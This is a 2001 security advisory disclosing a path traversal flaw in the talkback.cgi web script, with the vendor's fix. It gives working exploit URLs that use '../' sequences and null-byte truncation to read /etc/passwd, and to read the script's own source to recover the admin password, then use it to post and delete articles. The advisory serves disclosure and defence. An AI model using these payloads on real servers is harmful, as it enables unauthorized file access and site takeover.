[whizkunde security advisory: talkback (CGI)]
http://www.whizkunde.org | stan@whizkunde.org
----------------------------------------------------------
Release date:     April 9th 2001
Subject:          talkback.cgi security problem
Systems affected: UNIX systems running talkback CGI script
Vendor:           http://www.waytotheweb.com
----------------------------------------------------------

1. problem

Talkback.cgi may allow remote users (website visitors) to view any
file on a webserver (depending on the user the webserver is running
as).

Consider this URL:

  http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
  ../../../../../../../../etc/passwd%00&action=view&matchview=1

This will display /etc/passwd (if the webserver user has access to
this file).

Another URL can display the source of talkback.cgi itself, which
contains the admin password:

  http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
  ../cgi-bin/talkback.cgi%00&action=view&matchview=1

(You might have to use another URL instead of
../cgi-bin/talkback.cgi%00; this depends on where the cgi-bin is
installed.)

In this file you can find $admin_password, which can be used in:

  http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin

to post & delete articles.

2. fix

Way To The Web has released an updated version of talkback.cgi that
isn't vulnerable to this problem:

  http://www.waytotheweb.com/webscripts/talkback.htm

----------------------------------------------------------
Stan a.k.a. ThePike
stan@whizkunde.org
http://www.whizkunde.org

Copyright whizkunde security team 2001